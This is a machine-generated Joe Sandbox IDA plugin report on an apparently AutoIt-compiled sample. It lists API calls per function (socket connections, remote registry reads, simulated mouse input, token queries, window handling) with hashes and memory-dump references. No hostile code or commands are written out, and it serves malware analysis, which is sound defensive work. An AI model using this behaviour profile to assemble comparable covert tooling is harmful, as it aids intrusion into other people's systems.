                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 7019838562aa49e040cb862b54ae916205aed40363bc0a7944d33993c5a0a18d
                                                                                                                • Instruction ID: 97eb542b960a23c277de0543dae9434ca4c069e7a1e46eff4f417d93ae18dd8b
                                                                                                                • Opcode Fuzzy Hash: 7019838562aa49e040cb862b54ae916205aed40363bc0a7944d33993c5a0a18d
                                                                                                                • Instruction Fuzzy Hash: B0219472605219AFDB10DFA8EC58DBBB3ECEB09360B018529F914DB160D6709C419B60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00957D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00957DB6
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009561C6
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009561D5
                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0095620E
                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00956217
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00956221
                                                                                                                • closesocket.WSOCK32(00000000), ref: 0095624A
                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00956263
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 910771015-0
                                                                                                                • Opcode ID: b789efee8d1d2cd690b89a217f7b9c730a93eb8b6760a12938586aaab911fe0e
                                                                                                                • Instruction ID: fb86ca3e556adbbebb36f1fb3b65f1bcf391d8c90b07f6544d2945998b02d2e4
                                                                                                                • Opcode Fuzzy Hash: b789efee8d1d2cd690b89a217f7b9c730a93eb8b6760a12938586aaab911fe0e
                                                                                                                • Instruction Fuzzy Hash: 4831D031604118ABDF10EF25DC85BBA7BACEB45361F004069FD05E7291CBB0AC089BA2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                • Opcode ID: 8e1ac3de5ead02f7428365abc30845cdcc61b0fdd9be36e864367375b75f0ea7
                                                                                                                • Instruction ID: 6edd8369c0c9664722263926cd9ed9c9a83cf8452d9b7a30451137415b2d0360
                                                                                                                • Opcode Fuzzy Hash: 8e1ac3de5ead02f7428365abc30845cdcc61b0fdd9be36e864367375b75f0ea7
                                                                                                                • Instruction Fuzzy Hash: 4C217673A046116AC630AB34EC23FBB739CEF95348F10843AF84A86091EB549D42C695
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DC09
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DC2F
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0093DC32
                                                                                                                • SysAllocString.OLEAUT32 ref: 0093DC53
                                                                                                                • SysFreeString.OLEAUT32 ref: 0093DC5C
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0093DC76
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0093DC84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: 253af358c2d1112ce225f767be95c6f6a80591487df450133ffca2b3092d8aa7
                                                                                                                • Instruction ID: d1281feb0fb740064a489aa4d2fa79778d3af56961f404576c0237aeac4a24f0
                                                                                                                • Opcode Fuzzy Hash: 253af358c2d1112ce225f767be95c6f6a80591487df450133ffca2b3092d8aa7
                                                                                                                • Instruction Fuzzy Hash: 06218335619204AFDB10DFB8EC98DAB77ECEB49360F108129F954CB2A0DAB4DD41DB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008E1D73
                                                                                                                  • Part of subcall function 008E1D35: GetStockObject.GDI32(00000011), ref: 008E1D87
                                                                                                                  • Part of subcall function 008E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E1D91
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00967632
                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0096763F
                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0096764A
                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00967659
                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00967665
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                • Opcode ID: 46c90b717348586c0d0ae5f5a709c9a759c9d9d5abb18bf0bbadc3973863b4dd
                                                                                                                • Instruction ID: 5dd5de941cb64dbd03c64e673c346763539b4bc3387b052ab910deafb978c85d
                                                                                                                • Opcode Fuzzy Hash: 46c90b717348586c0d0ae5f5a709c9a759c9d9d5abb18bf0bbadc3973863b4dd
                                                                                                                • Instruction Fuzzy Hash: 3711B6B1114219BFEF118F64CC85EE7BF5DEF08798F014114B604A2060C6729C21DBA4
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00903F85), ref: 00904085
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0090408C
                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 00904097
                                                                                                                • DecodePointer.KERNEL32(00903F85), ref: 009040B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                • API String ID: 3489934621-2819208100
                                                                                                                • Opcode ID: ba2830676e231eea7d55547d3a0d8da0cc542d6db03c3da944222afa6000658d
                                                                                                                • Instruction ID: 296d99aeb1a6ac93218b867dad64aa81b3fe1358221ba5daf5467b4c6d0150cb
                                                                                                                • Opcode Fuzzy Hash: ba2830676e231eea7d55547d3a0d8da0cc542d6db03c3da944222afa6000658d
                                                                                                                • Instruction Fuzzy Hash: 35E0BF7167D300DFEB209F61FD1DB157AA5BB0578AF208029F111E51E0CBB64604EB54
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 008E1DDC
                                                                                                                • GetWindowRect.USER32(?,?), ref: 008E1E1D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 008E1E45
                                                                                                                • GetClientRect.USER32(?,?), ref: 008E1F74
                                                                                                                • GetWindowRect.USER32(?,?), ref: 008E1F8D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1296646539-0
                                                                                                                • Opcode ID: 2f110d3d3937c5302ff61326dde6e8689a04eda0a007c911a55463dbd8387500
                                                                                                                • Instruction ID: 7731686f7202167ca6c7374008696e5f0237fc52e8af992ced636187618b422e
                                                                                                                • Opcode Fuzzy Hash: 2f110d3d3937c5302ff61326dde6e8689a04eda0a007c911a55463dbd8387500
                                                                                                                • Instruction Fuzzy Hash: 93B14879A0028ADBDF10CFA9C5847EEB7B1FF09314F149129EC59EB254DB70AA40CB94
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253778849-0
                                                                                                                • Opcode ID: 64054722508a541f7d4bdc1b16eea9670213e6d5314917a8f727005dfdec98dc
                                                                                                                • Instruction ID: ddc008b71a6fe03fbcc7035e8db904e148e48371feb87f5e4bab7a8678b06d39
                                                                                                                • Opcode Fuzzy Hash: 64054722508a541f7d4bdc1b16eea9670213e6d5314917a8f727005dfdec98dc
                                                                                                                • Instruction Fuzzy Hash: 9B619D7050029A9BCF01EF65CC81FFE37A9FF86308F054929F999AB192DB749805CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009602BD
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009602FD
                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00960320
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00960349
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096038C
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00960399
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4046560759-0
                                                                                                                • Opcode ID: ba21c1e414529cbf8110bb62511079d5ba15c85f74e10a894f619b6df0c8b2b4
                                                                                                                • Instruction ID: 3c1a2770c0578e30ffaa2dc286acb4d66444443924872714e798db4ec7ce08a0
                                                                                                                • Opcode Fuzzy Hash: ba21c1e414529cbf8110bb62511079d5ba15c85f74e10a894f619b6df0c8b2b4
                                                                                                                • Instruction Fuzzy Hash: 90515831208240AFC704EF68D895EAFBBE9FF85314F04492DF5958B2A2DB71E905DB52
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 009657FB
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00965832
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0096585A
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 009658C9
                                                                                                                • GetSubMenu.USER32(?,?), ref: 009658D7
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00965928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                • String ID:
                                                                                                                • API String ID: 650687236-0
                                                                                                                • Opcode ID: 1756b0b28991b41be9b9d19e4c4e7616797a3332e2a357b3240029b5efab5db7
                                                                                                                • Instruction ID: 202410a806e323769abdba4fb576bac8991733f6d4c910928ea5d4100f7a588e
                                                                                                                • Opcode Fuzzy Hash: 1756b0b28991b41be9b9d19e4c4e7616797a3332e2a357b3240029b5efab5db7
                                                                                                                • Instruction Fuzzy Hash: 39517C31E00615EFCF11EF64C845AAEBBB4EF49320F114469E856BB351CB74AE41DB91
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0093EF06
                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 0093EF78
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0093EFD3
                                                                                                                • _memmove.LIBCMT ref: 0093EFFD
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0093F04A
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0093F078
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1101466143-0
                                                                                                                • Opcode ID: 7b64cbd07b94d4fd10cfe7d4b47453e9767260ab9dfd2d7d5e1f8245e9b53e5d
                                                                                                                • Instruction ID: 19d1e8c2a1bfd9f1a623fac7a37c151416a4f37a654c0f91654e044f95650d58
                                                                                                                • Opcode Fuzzy Hash: 7b64cbd07b94d4fd10cfe7d4b47453e9767260ab9dfd2d7d5e1f8245e9b53e5d
                                                                                                                • Instruction Fuzzy Hash: 4B5166B5A00209EFCB14CF58C894AAAB7B8FF4C314F15856AE959DB341E734E911CFA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942258
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009422A3
                                                                                                                • IsMenu.USER32(00000000), ref: 009422C3
                                                                                                                • CreatePopupMenu.USER32 ref: 009422F7
                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00942355
                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00942386
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311875123-0
                                                                                                                • Opcode ID: 7fbe833a3502859085173bc81808db7e772fbe4f74a940af3acde53077beefb1
                                                                                                                • Instruction ID: 167d2bcef9130361ebdf97763cdf28647689835fc63602e32e62d3187b66d814
                                                                                                                • Opcode Fuzzy Hash: 7fbe833a3502859085173bc81808db7e772fbe4f74a940af3acde53077beefb1
                                                                                                                • Instruction Fuzzy Hash: C351CF3060420ADFDF25CF68D888FAEBBF9BF45714F508629F811A7290E3B99944CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 008E179A
                                                                                                                • GetWindowRect.USER32(?,?), ref: 008E17FE
                                                                                                                • ScreenToClient.USER32(?,?), ref: 008E181B
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008E182C
                                                                                                                • EndPaint.USER32(?,?), ref: 008E1876
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 1827037458-0
                                                                                                                • Opcode ID: ccf1bb9f9ac87d1600b1d7e37db40ee5e7c5c513abfd29b565ce20cf60d65b45
                                                                                                                • Instruction ID: dbb068be58b3230b343ff2991c1f5459390373ae2da6784cf329fdc908361f01
                                                                                                                • Opcode Fuzzy Hash: ccf1bb9f9ac87d1600b1d7e37db40ee5e7c5c513abfd29b565ce20cf60d65b45
                                                                                                                • Instruction Fuzzy Hash: 4A41A131208344AFDB10DF29DC88FBA7BE8FB4A724F144669F5A4C61B1C7709845EB62
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(009A57B0,00000000,01455560,?,?,009A57B0,?,0096B5A8,?,?), ref: 0096B712
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0096B736
                                                                                                                • ShowWindow.USER32(009A57B0,00000000,01455560,?,?,009A57B0,?,0096B5A8,?,?), ref: 0096B796
                                                                                                                • ShowWindow.USER32(00000000,00000004,?,0096B5A8,?,?), ref: 0096B7A8
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0096B7CC
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0096B7EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: a1554ee6dc1e07dee195596b8a4cec9929598224c6d53af5ea1362335ea57701
                                                                                                                • Instruction ID: d4a264d82ab7cf297b38258d16c915fa61a247283beaeda34e391d2c7eba82ec
                                                                                                                • Opcode Fuzzy Hash: a1554ee6dc1e07dee195596b8a4cec9929598224c6d53af5ea1362335ea57701
                                                                                                                • Instruction Fuzzy Hash: 3041C034604244EFDB22CF28C499B947BE4FF85311F1881B9F948CFAA2D771A896CB50
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00954E41,?,?,00000000,00000001), ref: 009570AC
                                                                                                                  • Part of subcall function 009539A0: GetWindowRect.USER32(?,?), ref: 009539B3
                                                                                                                • GetDesktopWindow.USER32 ref: 009570D6
                                                                                                                • GetWindowRect.USER32(00000000), ref: 009570DD
                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0095710F
                                                                                                                  • Part of subcall function 00945244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                • GetCursorPos.USER32(?), ref: 0095713B
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00957199
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                • Opcode ID: df117964285e36145f21917d7f665a69765d192889cb25b9804ac69f41ff4233
                                                                                                                • Instruction ID: 7566621acda721e7c83a144df6d1a22193931e4572fda18f96a88ed0bfd34872
                                                                                                                • Opcode Fuzzy Hash: df117964285e36145f21917d7f665a69765d192889cb25b9804ac69f41ff4233
                                                                                                                • Instruction Fuzzy Hash: B331F272108305ABC720DF55E849F9BB7A9FF88304F000919F88597191C770EA08CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009380C0
                                                                                                                  • Part of subcall function 009380A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009380CA
                                                                                                                  • Part of subcall function 009380A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009380D9
